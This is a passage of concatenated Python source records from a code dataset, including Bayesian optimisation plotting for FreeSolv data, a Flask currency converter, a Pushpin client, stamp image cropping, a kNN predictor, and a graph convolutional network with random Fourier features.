hetero_running_sum / random_trials\n homo_errs = (np.sqrt(homo_squares / random_trials - homo_means ** 2, dtype=np.float64))/np.sqrt(random_trials)\n hetero_errs = (np.sqrt(hetero_squares / random_trials - hetero_means ** 2, dtype=np.float64))/np.sqrt(random_trials)\n aug_means = aug_running_sum / random_trials\n aug_errs = (np.sqrt(aug_squares / random_trials - aug_means ** 2, dtype=np.float64))/np.sqrt(random_trials)\n aug_het_means = aug_het_running_sum / random_trials\n aug_het_errs = (np.sqrt(aug_het_squares / random_trials - aug_het_means **2, dtype=np.float64))/np.sqrt(random_trials)\n\n rand_noise_means = rand_noise_running_sum / random_trials\n homo_noise_means = homo_noise_running_sum / random_trials\n hetero_noise_means = hetero_noise_running_sum / random_trials\n rand_noise_errs = (np.sqrt(rand_noise_squares / random_trials - rand_noise_means ** 2))/np.sqrt(random_trials)\n homo_noise_errs = (np.sqrt(homo_noise_squares / random_trials - homo_noise_means ** 2))/np.sqrt(random_trials)\n hetero_noise_errs = (np.sqrt(hetero_noise_squares / random_trials - hetero_noise_means ** 2))/np.sqrt(random_trials)\n aug_noise_means = aug_noise_running_sum / random_trials\n aug_noise_errs = (np.sqrt(aug_noise_squares / random_trials - aug_noise_means ** 2))/np.sqrt(random_trials)\n aug_het_noise_means = aug_het_noise_running_sum / random_trials\n aug_het_noise_errs = (np.sqrt(aug_het_noise_squares / random_trials - aug_het_noise_means ** 2))/np.sqrt(random_trials)\n\n print('List of average random values is: ' + str(rand_means))\n print('List of random errors is: ' + str(rand_noise_means))\n print('List of average homoscedastic values is: ' + str(homo_means))\n print('List of homoscedastic errors is: ' + str(homo_noise_means))\n print('List of average heteroscedastic values is ' + str(hetero_means))\n print('List of heteroscedastic errors is: ' + str(hetero_noise_means))\n print('List of average AEI values is: ' + str(aug_means))\n print('List of AEI errors is: ' + str(aug_noise_means))\n print('List of average het-AEI values is: ' + str(aug_het_means))\n print('List of het-AEI errors is: ' + str(aug_het_noise_means))\n\n iter_x = np.arange(1, bayes_opt_iters + 1)\n\n # clear figure from previous fplot returns if fiddling with form of function\n plt.cla()\n\n ax = plt.gca()\n ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n lower_rand = np.array(rand_means) - np.array(rand_errs)\n upper_rand = np.array(rand_means) + np.array(rand_errs)\n lower_homo = np.array(homo_means) - np.array(homo_errs)\n upper_homo = np.array(homo_means) + np.array(homo_errs)\n lower_hetero = np.array(hetero_means) - np.array(hetero_errs)\n upper_hetero = np.array(hetero_means) + np.array(hetero_errs)\n lower_aei = np.array(aug_means) - np.array(aug_errs)\n upper_aei = np.array(aug_means) + np.array(aug_errs)\n lower_het_aei = np.array(aug_het_means) - np.array(aug_het_errs)\n upper_het_aei = np.array(aug_het_means) + np.array(aug_het_errs)\n\n plt.plot(iter_x, rand_means, color='tab:orange', label='RS')\n plt.plot(iter_x, homo_means, color='tab:blue', label='EI')\n plt.plot(iter_x, hetero_means, color='tab:green', label='ANPEI')\n plt.plot(iter_x, aug_means, color='tab:red', label='AEI')\n plt.plot(iter_x, aug_het_means, color='tab:purple', label='HAEI')\n plt.fill_between(iter_x, lower_rand, upper_rand, color='tab:orange', alpha=0.1)\n plt.fill_between(iter_x, lower_homo, upper_homo, color='tab:blue', alpha=0.1)\n plt.fill_between(iter_x, lower_hetero, upper_hetero, color='tab:green', alpha=0.1)\n plt.fill_between(iter_x, lower_aei, upper_aei, color='tab:red', alpha=0.1)\n plt.fill_between(iter_x, lower_het_aei, upper_het_aei, color='tab:purple', alpha=0.1)\n\n #plt.title('Best Objective Function Value Found so Far', fontsize=16)\n plt.xlabel('Function Evaluations', fontsize=14)\n if penalty != 1:\n plt.ylabel(f'Hydration Free Energy (kcal/mol) + {penalty}*Noise', fontsize=14)\n else:\n plt.ylabel(f'Hydration Free Energy (kcal/mol) + Noise', fontsize=14)\n plt.tick_params(labelsize=14)\n #plt.legend(loc=1)\n plt.legend(loc='lower left', bbox_to_anchor=(0.0, -0.425), ncol=3, borderaxespad=0, fontsize=14, frameon=False)\n plt.savefig('new_freesolv_figures/bayesopt_plot{}_iters_{}_random_trials_and_init_num_samples_of_{}_and_seed_{}_'\n 'new_acq_penalty_is_{}_aleatoric_weight_is_{}_n_components_is_{}_new_aei_comp_seed_check'.\n format(bayes_opt_iters, random_trials, init_num_samples, numpy_seed, penalty, aleatoric_weight, n_components), bbox_inches='tight')\n\n plt.close()\n\n # clear figure from previous fplot returns if fiddling with form of function\n plt.cla()\n\n ax = plt.gca()\n ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n lower_noise_rand = np.array(rand_noise_means) - np.array(rand_noise_errs)\n upper_noise_rand = np.array(rand_noise_means) + np.array(rand_noise_errs)\n lower_noise_homo = np.array(homo_noise_means) - np.array(homo_noise_errs)\n upper_noise_homo = np.array(homo_noise_means) + np.array(homo_noise_errs)\n lower_noise_hetero = np.array(hetero_noise_means) - np.array(hetero_noise_errs)\n upper_noise_hetero = np.array(hetero_noise_means) + np.array(hetero_noise_errs)\n lower_noise_aei = np.array(aug_noise_means) - np.array(aug_noise_errs)\n upper_noise_aei = np.array(aug_noise_means) + np.array(aug_noise_errs)\n lower_noise_het_aei = np.array(aug_het_noise_means) - np.array(aug_het_noise_errs)\n upper_noise_het_aei = np.array(aug_het_noise_means) + np.array(aug_het_noise_errs)\n\n plt.plot(iter_x, rand_noise_means, color='tab:orange', label='RS')\n plt.plot(iter_x, homo_noise_means, color='tab:blue', label='EI')\n plt.plot(iter_x, hetero_noise_means, color='tab:green', label='ANPEI')\n plt.plot(iter_x, aug_noise_means, color='tab:red', label='AEI')\n plt.plot(iter_x, aug_het_noise_means, color='tab:purple', label='HAEI')\n plt.fill_between(iter_x, lower_noise_rand, upper_noise_rand, color='tab:orange', alpha=0.1)\n plt.fill_between(iter_x, lower_noise_homo, upper_noise_homo, color='tab:blue', alpha=0.1)\n plt.fill_between(iter_x, lower_noise_hetero, upper_noise_hetero, color='tab:green', alpha=0.1)\n plt.fill_between(iter_x, lower_noise_aei, upper_noise_aei, color='tab:red', alpha=0.1)\n plt.fill_between(iter_x, lower_noise_het_aei, upper_noise_het_aei, color='tab:purple', alpha=0.1)\n\n #plt.title('Lowest Aleatoric Noise Found so Far', fontsize=16)\n plt.xlabel('Function Evaluations', fontsize=14)\n plt.ylabel('Aleatoric Noise', fontsize=14)\n plt.tick_params(labelsize=14)\n #plt.legend(loc=1)\n plt.legend(loc='lower left', bbox_to_anchor=(0.0, -0.425), ncol=3, borderaxespad=0, fontsize=14, frameon=False)\n plt.savefig('new_freesolv_figures/bayesopt_plot{}_iters_{}_random_trials_and_init_num_samples_of_{}_and_seed_{}_'\n 'noise_only_new_acq_penalty_is_{}_aleatoric_weight_is_{}_n_components_is_{}_new_aei_comp_seed_check'.\n format(bayes_opt_iters, random_trials, init_num_samples, numpy_seed, penalty, aleatoric_weight, n_components), bbox_inches='tight')\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-p', '--penalty', type=int, default=1,\n help='$\\alpha$ parameter specifying weight of noise component to objective.')\n parser.add_argument('-a', '--aleatoric_weight', type=float, default=1,\n help='The value of both $\\beta and $\\gamma of ANPEI and HAEI')\n parser.add_argument('-r', '--random_trials', type=int, default=50,\n help='Number of random initialisations')\n parser.add_argument('-b', '--bayes_opt_iters', type=int, default=10,\n help='The number of iterations of BayesOpt')\n parser.add_argument('-t', '--init_set_size', type=float, default=0.2,\n help='The fraction of datapoints to initialise with')\n parser.add_argument('-pc', '--n_components', type=int, default=14,\n help='The number of principle components to keep')\n parser.add_argument('-path', '--path', type=str, default='../bayesopt_datasets/Freesolv/Freesolv.txt',\n help='The path to the Freesolv.txt file')\n\n args = parser.parse_args()\n\n main(args.penalty, args.aleatoric_weight, args.random_trials, args.bayes_opt_iters, args.init_set_size,\n args.n_components, args.path)\n","sub_path":"BayesOpt/bayesopt_experiments/freesolv.py","file_name":"freesolv.py","file_ext":"py","file_size_in_byte":27535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"605411753","text":"from collections import Counter\nN =int(input())\nA = Counter(list(map(int,input().split())))\nB = Counter(list(map(int,input().split())))\nC = Counter(list(map(int,input().split())))\nA_sort = sorted(A.items())\nB_sort = sorted(B.items())\nC_sort = sorted(C.items())\n\nBtoC = []\nans = 0\nstart_j = 0\nstart_k = 0\nsum_val = N\nfor j in range(len(B_sort)):\n for k in range(start_k , len(C_sort)):\n if B_sort[j][0] >= C_sort[k][0]:\n sum_val -= C_sort[k][1]\n start_k = k + 1\n else:\n BtoC.append([B_sort[j][0] , sum_val * B_sort[j][1]])\n break\n#print(BtoC)\nwork = 0\nfor i in range(len(BtoC) - 2 , -1 , -1):\n BtoC[i][1] = BtoC[i+1][1] + BtoC[i][1]\n work = BtoC[i+1][1]\n#print(BtoC)\nfor i in range(len(A_sort)):\n for j in range(start_j , len(BtoC)):\n if A_sort[i][0] >= BtoC[j][0]:\n start_j = j + 1\n else:\n ans += A_sort[i][1] * BtoC[j][1]\n break\nprint(ans)","sub_path":"ABC/77/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"507418557","text":"# -*- coding: utf-8 -*-\n\nfrom gripcontrol import GripPubControl\nfrom gripcontrol import WebSocketMessageFormat\nfrom pubcontrol import Item\n\nfrom restapi.utilities.logs import log\nfrom restapi.flask_ext import BaseExtension\n\n\nclass ServiceUnavailable(BaseException):\n pass\n\n\nclass PushpinExt(BaseExtension):\n\n def set_connection_exception(self):\n return ServiceUnavailable\n\n def custom_connection(self, **kwargs):\n\n if len(kwargs) > 0:\n variables = kwargs\n else:\n variables = self.variables\n\n host = variables.get('host')\n port = variables.get('port')\n\n control_uri = 'http://{}:{}'.format(host, port)\n pubctrl = GripPubControl({\n 'control_uri': control_uri\n })\n\n client = PushpinClient(pubctrl)\n\n is_active = client.publish_on_stream('admin', 'Connection test', sync=True)\n\n if is_active:\n return client\n\n raise ServiceUnavailable(\"Pushpin unavailable on {}\".format(control_uri))\n\n\nclass PushpinClient:\n\n def __init__(self, pub):\n self.pub = pub\n\n def callback(self, result, message):\n if result:\n log.debug('Message successfully published on pushpin')\n else:\n log.error('Publish failed on pushpin: {}', message)\n\n def publish_on_stream(self, channel, message, sync=False):\n if not sync:\n self.pub.publish_http_stream(\n channel, message, callback=self.callback)\n return True\n\n try:\n self.pub.publish_http_stream(channel, message, blocking=True)\n log.debug('Message successfully published on pushpin')\n return True\n except BaseException as e:\n log.error('Publish failed on pushpin: {}', message)\n log.error(e)\n return False\n\n def publish_on_socket(self, channel, message, sync=False):\n item = Item(WebSocketMessageFormat(message, binary=False))\n if not sync:\n self.pub.publish(channel, item, callback=self.callback)\n return True\n\n try:\n self.pub.publish(channel, item, blocking=True)\n log.debug('Message successfully published on pushpin')\n return True\n except BaseException as e:\n log.error('Publish failed on pushpin: {}', message)\n log.error(e)\n return False\n","sub_path":"restapi/flask_ext/flask_pushpin.py","file_name":"flask_pushpin.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"484892791","text":"\r\nimport os\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nimport PIL\r\nfrom PIL import Image\r\nimport glob2\r\n\r\nnames = []\r\n# for file in os.listdir('C:\\Users\\dcc\\Desktop\\stamps\\preprocess\\Part_Crop\\Cropout_stamp'):\r\n # if file.endswith('.jpg'):\r\n # names.append(file)\r\n\r\n\r\nimages = []\r\n\r\npath_to_images = '/shared/kgcoe-research/mil/stamp_stamp/data/cropout_stamp/181'\r\nall_imgs = glob2.glob(path_to_images+'/**/*.jpg')\r\n# for img in all_imgs:\r\n # n= cv2.imread(img)\r\n # images.append(n)\r\n # names.append(img.split('/')[-1].split('.')[0])\r\n\r\n\r\n\r\nfor i in xrange(20):\r\n # print i\r\n img = cv2.imread(all_imgs[i])\r\n name = all_imgs[i].split('/')[-1].split('.')[0]\r\n #Convert BGR image to RGB\r\n # img= images[i]\r\n b,g,r = cv2.split(img)\r\n img2 = cv2.merge([r,g,b])\r\n\r\n # # Crop Corners----->PLATE Row and Column of the Stamp\r\n # m = 0.16*img2.shape[1] #Left part\r\n # n=0.84*img2.shape[1] #Right part\r\n # p=0.13*img2.shape[0] #Top part\r\n # q=0.87*img2.shape[0] #Bottom part\r\n\r\n # Crop Corners----->PLATE Row and Column of the Stamp\r\n m = 0.16*img2.shape[1] #Left part\r\n n=0.84*img2.shape[1] #Right part\r\n p=0.26*img2.shape[0] #Top part\r\n q=0.74*img2.shape[0] #Bottom part\r\n\r\n img_crop1 = img2[0:p,0:m ,:]\r\n img_crop2 = img2[0:p,n:,:]\r\n img_crop3 = img2[q:, 0:m,:]\r\n img_crop4 = img2[q:, n:, :]\r\n\r\n #Resize Corners\r\n dim = (112, 224)\r\n img_crop1 = cv2.resize(img_crop1, dim, interpolation=cv2.INTER_AREA)\r\n img_crop2 = cv2.resize(img_crop2, dim, interpolation=cv2.INTER_AREA)\r\n img_crop3 = cv2.resize(img_crop3, dim, interpolation=cv2.INTER_AREA)\r\n img_crop4 = cv2.resize(img_crop4, dim, interpolation=cv2.INTER_AREA)\r\n\r\n #Combine to get a block of 4 Corners [1,2];[3,4]\r\n column1 = np.concatenate((img_crop1,img_crop3),axis=0)\r\n column2 = np.concatenate((img_crop2, img_crop4), axis=0)\r\n block = np.concatenate((column1,column2),axis=1)\r\n\r\n #Combine to get Same element block\r\n Row = np.concatenate((img_crop1,img_crop4),axis=1)\r\n Column= np.concatenate((img_crop3, img_crop2), axis=1)\r\n\r\n # Crop Side-Middle portion----->PLATE number of the Stamp\r\n width_plate_left = 0.24*img2.shape[1] \r\n width_plate_right = 0.86*img2.shape[1] \r\n x= 0.35*img2.shape[0] #Middle Top\r\n y= 0.65*img2.shape[0] #Middle Bottom\r\n\r\n img_crop5 = img2[x:y,0:width_plate_left,:]\r\n img_crop6 = img2[x:y,width_plate_right:,:]\r\n\r\n #Resize\r\n dim = (135, 224)\r\n img_crop5= cv2.resize(img_crop5,dim,interpolation=cv2.INTER_AREA)\r\n dim = (89, 224)\r\n \r\n img_crop6 = cv2.resize(img_crop6, dim, interpolation=cv2.INTER_AREA)\r\n\r\n #Combine to get Final ouptut--->PLATE number\r\n visual = np.concatenate((img_crop5,img_crop6),axis=1)\r\n\r\n cv2.imwrite('crop_row_'+name+'.jpg',cv2.cvtColor(Row, cv2.COLOR_BGR2RGB))\r\n cv2.imwrite('crop_column_'+name+'.jpg',cv2.cvtColor(Column, cv2.COLOR_BGR2RGB)) \r\n cv2.imwrite('crop_plate_'+name+'.jpg',cv2.cvtColor(visual, cv2.COLOR_BGR2RGB))\r\n \r\ncv2.waitKey(0)\r\n","sub_path":"pre_processing/part_crop.py","file_name":"part_crop.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"96717092","text":"from sklearn.datasets import load_svmlight_file\nimport numpy as np\nimport sys\n\ndef checkacc(Yts,Yts_correct):\n\twrong=0\n\tfor i in range(Yts_correct.shape[0]):\n\t\tif(Yts[i]!=Yts_correct[i]):\n\t\t\twrong=wrong+1\n\tacc=(Yts_correct.shape[0]-wrong)/Yts_correct.shape[0]\n\treturn acc\n\ndef predict(Xtr, Ytr, Xts, k, metric=None):\n\n N, D = Xtr.shape\n\n assert N == Ytr.shape[0], \"Number of samples don't match\"\n assert D == Xts.shape[1], \"Train and test dimensions don't match\"\n\n if metric is None:\n metric = np.identity(D)\n\n Yts = np.zeros((Xts.shape[0], 1))\n\n for i in range(Xts.shape[0]):\n a=Xtr-Xts[i]\n LMNN_dist=[]\n mult=np.dot(a,metric)\n for x in range(Xtr.shape[0]):\n LMNN_dist.append(np.dot(a[x],mult[x]))\n LMNN_dist=np.array(LMNN_dist)\n indx=np.argpartition(LMNN_dist,k)[:k]\n (_, idx, counts) = np.unique(Ytr[indx], return_index=True, return_counts=True)\n index = idx[np.argmax(counts)]\n Yts[i]=Ytr[indx][index]\n print(i,Yts[i],k)\n\n return Yts\n\ndef main(): \n\n # Get training and testing file names from the command line\n traindatafile = sys.argv[1]\n testdatafile = sys.argv[2]\n\n # The training file is in libSVM format\n tr_data = load_svmlight_file(traindatafile)\n\n Xtr = tr_data[0].toarray();\n Ytr = tr_data[1];\n\n # The testing file is in libSVM format too\n ts_data = load_svmlight_file(testdatafile)\n\n Xts = ts_data[0].toarray();\n Yts_correct=ts_data[1];\n # The test labels are useless for prediction. They are only used for evaluation\n\n # Load the learned metric\n metric = np.load(\"model.npy\")\n\n ### Do soemthing (if required) ###\n \n acc=[]\n k=13\n \n Yts = predict(Xtr, Ytr, Xts, k, metric)\n acc=checkacc(Yts,Yts_correct)\n\n np.savetxt(\"Accuracy.dat\",acc)\n\n # Save predictions to a file\n\t# Warning: do not change this file name\n # np.savetxt(\"testY.dat\", Yts)\n\nif __name__ == '__main__':\n main()\n","sub_path":"CS771/Assignments/assn1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"579803966","text":"#!/usr/bin/env python3\nimport json\nimport logging\n\nfrom flask import Flask, request, make_response, jsonify\nfrom currency_converter import CurrencyConverter, CurrencyError\n\napp = Flask(__name__)\n\n\n@app.route('/currency_converter', methods=['GET'])\ndef currency_converter():\n \"\"\"Handle requests for converting currencies.\"\"\"\n amount = request.args.get(\"amount\")\n input_currency = request.args.get(\"input_currency\")\n output_currency = request.args.get(\"output_currency\")\n\n if amount is None or input_currency is None:\n return make_response(jsonify({\n \"error\": \"Missing required value(s)\",\n \"description\": \"amount or input_currency is not specified\"}), 400)\n\n if not amount or not input_currency:\n return make_response(jsonify({\n \"error\": \"Value(s) not specified\",\n \"description\": \"amount or input_currency has no value\"}), 400)\n\n try:\n converter.load_rates()\n result = converter.convert(input_currency,\n output_currency,\n float(amount))\n except CurrencyError:\n # json.dumps converts utf8 codes into symbols, jsonify couldn't\n return make_response(json.dumps({\n \"error\": \"Invalid currency\",\n \"supportedCurrencies\": converter.codes}, ensure_ascii=False), 400)\n except Exception as e:\n logging.exception(e)\n return make_response(jsonify({\"error\": \"Server error\"}), 500)\n\n return make_response(jsonify(result), 200)\n\n\n@app.errorhandler(404)\ndef error_handler(e):\n return make_response(jsonify({\"error\": \"Not found\"}), 404)\n\n\nif __name__ == '__main__':\n converter = CurrencyConverter()\n app.run()\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"529423651","text":"\n\nfrom xai.brain.wordbase.nouns._slipper import _SLIPPER\n\n#calss header\nclass _SLIPPERS(_SLIPPER, ):\n\tdef __init__(self,): \n\t\t_SLIPPER.__init__(self)\n\t\tself.name = \"SLIPPERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"slipper\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_slippers.py","file_name":"_slippers.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"163346931","text":"#!/usr/bin/env python\n\n'''\nCreated by Samvel Khalatyan, Feb 23, 2012\nCopyright 2011, All rights reserved\n'''\n\nimport random\n\nclass Style(object):\n '''\n Minimalistic style for plots\n '''\n\n def __init__(self,\n color = 1, # black by default\n marker_size = 0.5,\n marker_style = 1,\n line_width = 2,\n line_style = None,\n fill_style = 1001):\n\n self.__color = color\n self.__marker_size = marker_size\n self.__marker_style = marker_style\n self.__line_width = line_width\n self.__line_style = line_style\n self.__fill_style = fill_style\n\n @property\n def color(self):\n '''\n Histogram color. It should be applied to:\n - marker\n - line\n - fill (if fill flag is set)\n '''\n\n return self.__color\n\n @property\n def marker_size(self):\n '''\n Marker size\n '''\n\n return self.__marker_size\n\n @property\n def marker_style(self):\n '''\n Marker style\n '''\n\n return self.__marker_style\n\n @property\n def line_width(self):\n '''\n Width of the bar lines\n '''\n\n return self.__line_width\n\n @property\n def line_style(self):\n '''\n Style of the bar lines\n '''\n\n return self.__line_style\n\n @property\n def fill_style(self):\n '''\n Indicate whether histogram should be filled with specified color\n '''\n\n return self.__fill_style\n\n def apply(self, plot):\n plot.SetLineColor(self.color)\n plot.SetFillColor(self.color)\n\n plot.SetFillStyle(self.fill_style)\n plot.SetMarkerStyle(self.marker_style)\n\n plot.SetMarkerSize(self.marker_size)\n plot.SetLineWidth(self.line_width)\n\n if self.line_style:\n plot.SetLineStyle(self.line_style)\n\n def __str__(self):\n return (\"<{Class} color {color} marker size {marker_size} \"\n \"line width {line_width} fill {fill} at 0x{ID:x}>\").format(\n Class = self.__class__.__name__,\n ID = id(self),\n color = self.color,\n marker_size = self.marker_size,\n line_width = self.line_width,\n fill = self.__fill_style)\n\nclass BaseStyle(object):\n '''\n Base for all histogram styles. It can be set to certain values that are\n allowed by __contains__ method. Child classes should overload above\n method, e.g.:\n\n class HumanStyle(BaseStyle):\n human_styles = set([\"male\", \"female\"])\n\n def __init__(self, style):\n BaseStyle.__init__(self, style)\n\n def __contains__(self, style):\n # Test if style is allowed\n return (style in self.human_styles or\n BaseStyle.__contains__(self, style))\n\n By default, BaseStyle does not allow any style to be set. The value of\n current style can be fixed if instance was created with fixed parameter\n set to True. Otherwise, style can be later changed, e.g.:\n\n class HumanStyle(BaseStyle):\n ...\n\n def __init__(self, style):\n BaseStyle.__init__(self, style, fixed = False)\n\n ...\n\n human = HumanStyle(\"male\")\n human.style = \"female\"\n\n Child classes may also define attribute name for stored current style,\n e.g.:\n\n class HumanStyle(BaseStyle):\n ...\n\n def __init__(self, style):\n BaseStyle.__init__(self, style, attribute_name = \"human_style\")\n\n ...\n\n Otherwise a random variable name is used.\n '''\n\n def __init__(self, obj_style, attribute_name = None, fixed = True):\n '''\n Initialize style with value if allowed by __contains__, store in\n a variable with attribute_name (or random name if not set), and\n fix style if fixed argument is set to True\n '''\n\n if attribute_name:\n self.__attribute_name = \"__{0}\".format(attribute_name)\n else:\n self.__attribute_name = \"__{0:x}\".format(random.getrandbits(128))\n\n # allow style to be set first\n self.__fixed = False\n\n self.style = obj_style\n\n # fix style if asked to\n self.__fixed = fixed\n\n @property\n def style(self):\n '''\n Get current style\n '''\n\n return getattr(self, self.__attribute_name)\n\n @style.setter\n def style(self, value):\n '''\n Style attribute is only set if allowed by __contains__ method and not\n fixed\n '''\n\n if self.__fixed:\n raise AttributeError(\"can not change fixed style\")\n\n if value not in self:\n raise AttributeError(\"unsupported style {0}\".format(value))\n else:\n setattr(self, self.__attribute_name, value)\n\n @style.deleter\n def style(self):\n '''\n Remove style attribute\n '''\n\n delattr(self, self.__attribute_name)\n\n def __contains__(self, value):\n '''\n Do not allow any style by default\n '''\n\n return False\n\n def __str__(self):\n '''\n Nice print\n '''\n\n return \"<{Class} {Style} at 0x{ID:x}>\".format(\n Class = self.__class__.__name__,\n ID = id(self),\n Style = self.style\n )\n\nif \"__main__\" == __name__:\n import unittest\n\n class HumanStyle(BaseStyle):\n human_styles = set([\"male\", \"female\"])\n\n def __init__(self, style, fixed = True):\n BaseStyle.__init__(self, style, fixed = fixed)\n\n def __contains__(self, style):\n return (style in self.human_styles or\n BaseStyle.__contains__(self, style))\n\n class TestBaseStyle(unittest.TestCase):\n def test_empty(self):\n self.assertRaises(AttributeError, BaseStyle, \"hello\")\n\n class TestHumanStyle(unittest.TestCase):\n def test_male(self):\n human = HumanStyle(\"male\")\n self.assertEqual(human.style, \"male\")\n\n def test_female(self):\n human = HumanStyle(\"female\")\n self.assertEqual(human.style, \"female\")\n\n def test_ape(self):\n self.assertRaises(AttributeError, HumanStyle, \"ape\")\n\n def test_fixed(self):\n human = HumanStyle(\"male\")\n try:\n human.style = \"female\"\n except AttributeError:\n pass\n\n self.assertEqual(human.style, \"male\")\n\n def test_not_fixed(self):\n human = HumanStyle(\"male\", fixed = False)\n try:\n human.style = \"female\"\n except AttributeError:\n pass\n\n self.assertEqual(human.style, \"female\")\n\n unittest.main()\n","sub_path":"python/template/base_style.py","file_name":"base_style.py","file_ext":"py","file_size_in_byte":6938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"250676078","text":"import torch.nn as nn\nimport torch.nn.functional as F\nfrom gcn.pygcn.layers import GraphConvolution\nimport torch\nimport numpy as np\nfrom torch.autograd import Variable\n\nclass rff(nn.Module):\n # rff_width, the larger the better approximation\n def __init__(self, sigma=1, rff_width=20000):\n super(rff, self).__init__()\n self.sigma = sigma\n self.rff_width = rff_width\n self.phase_shift = None\n self.RFF_scale = np.sqrt(2.0 / self.rff_width)\n\n def initialize_RFF(self, x, sigma, output_torch, dtype=torch.FloatTensor):\n self.x = x\n\n if self.phase_shift is not None: return\n # if x.shape[0] == self.N: return\n\n self.N = x.shape[0]\n self.d = x.shape[1]\n self.sigma = sigma\n\n if type(x) == torch.Tensor or type(x) == np.ndarray:\n self.phase_shift = 2 * np.pi * np.random.rand(1, self.rff_width)\n # self.phase_shift = np.matlib.repmat(b, self.N, 1)\n self.rand_proj = np.random.randn(self.d, self.rff_width) / (self.sigma)\n else:\n raise ValueError('An unknown datatype is passed into get_rbf as %s' % str(type(x)))\n\n self.use_torch(output_torch, dtype)\n\n def use_torch(self, output_torch, dtype):\n if not output_torch: return\n\n dvc = self.x.device\n self.phase_shift = torch.from_numpy(self.phase_shift)\n self.phase_shift = Variable(self.phase_shift.type(dtype), requires_grad=False)\n self.phase_shift = self.phase_shift.to(dvc,\n non_blocking=True) # make sure the data is stored in CPU or GPU device\n\n self.rand_proj = torch.from_numpy(self.rand_proj)\n self.rand_proj = Variable(self.rand_proj.type(dtype), requires_grad=False)\n self.rand_proj = self.rand_proj.to(dvc, non_blocking=True) # make sure the data is stored in CPU or GPU device\n\n def forward(self, x):\n self.initialize_RFF(x, self.sigma, True)\n\n if type(self.x) == np.ndarray:\n self.x = torch.from_numpy(self.x)\n self.x = Variable(self.x.type(self.dtype), requires_grad=False)\n\n elif type(self.x) != torch.Tensor:\n raise ValueError('An unknown datatype is passed into get_rbf as %s' % str(type(self.x)))\n\n P = self.RFF_scale * torch.cos(torch.mm(self.x, self.rand_proj) + self.phase_shift)\n return P\n\n def torch_rbf(self, x, sigma):\n P = self.__call__(x, sigma)\n K = torch.mm(P, P.transpose(0, 1))\n # K = (2.0/self.rff_width)*K\n K = F.relu(K)\n\n return K\n\n def np_feature_map(self, x):\n const = np.sqrt(2.0 / self.rff_width)\n feature_map = const * np.cos(x.dot(self.rand_proj) + self.phase_shift)\n\n return feature_map\n\n def np_rbf(self):\n P = np.cos(self.x.dot(self.rand_proj) + self.phase_shift)\n K = (2.0 / self.rff_width) * (P.dot(P.T))\n K = np.maximum(K, 0)\n K = np.minimum(K, 1)\n return K\n\n def get_rbf(self, x, sigma, output_torch=False, dtype=torch.FloatTensor):\n self.dtype = dtype\n self.initialize_RFF(x, sigma, output_torch, dtype)\n\n if output_torch:\n return self.torch_rbf(x, sigma)\n else:\n return self.np_rbf()\n\nclass GCN(nn.Module):\n def __init__(self, nfeat, nhid, nclass, dropout):\n super(GCN, self).__init__()\n\n self.gc1 = GraphConvolution(nfeat, nhid)\n # self.gc2 = GraphConvolution(nhid, nhid)\n # self.gc3 = GraphConvolution(nhid, nhid)\n self.gc4 = GraphConvolution(nhid, nclass)\n self.dropout = dropout\n self.act = rff(rff_width=nhid)\n # self.act = F.relu\n\n def forward(self, x, adj):\n x = self.act(self.gc1(x, adj))\n # x = self.act(self.gc2(x, adj))\n # x = self.act(self.gc3(x, adj))\n x = F.dropout(x, self.dropout, training=self.training)\n x = self.gc4(x, adj)\n return F.log_softmax(x, dim=1)\n","sub_path":"gcn/pygcn/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"272515350","text":"# fix_isbn.py - clean up mix of different delimiters in hh.bib\n\nimport pyglottolog.api\nfrom pyglottolog.references import Isbns\n\nFIELD = 'isbn'\n\nFIXES = {}\n\nif __name__ == '__main__':\n api = pyglottolog.api.Glottolog()\n hh = api.bibfiles['hh.bib']\n\n def iterfixed(bibfile):\n for e in bibfile.iterentries():\n value = e.fields.get(FIELD)\n if value is not None:\n value = FIXES.get(value, value)\n if value is None:\n del e.fields[FIELD]\n else:\n isbns = Isbns.from_field(value)\n e.fields[FIELD] = isbns.to_string()\n yield e.key, (e.type, e.fields)\n\n hh.save(list(iterfixed(hh)))\n","sub_path":"scripts/fix_isbn.py","file_name":"fix_isbn.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"380614145","text":"#! /usr/bin/python3\n\nwhile True:\n dokladnosc = input('Ludolfina zostanie wyliczona przy pomocy szeregu Leibniza podaj liczbę naturalną większą od jedynki, im większa liczba tym większa dokładność przybliżenia liczby Pi!: ')\n if dokladnosc.isdecimal() == True:\n dokladnosc = int(dokladnosc)\n break\n else:\n print('Podaj liczbę naturalną większą od jedynki')\n\nwhile True:\n if dokladnosc == 1:\n liczba_pi = 1\n break\n elif dokladnosc > 1:\n liczba_pi = 1\n dokladnosc += 1\n for i in range(1, dokladnosc + 1):\n if i % 2 == 1:\n liczba_pi = liczba_pi - 1/(i * 2 + 1)\n else:\n liczba_pi = 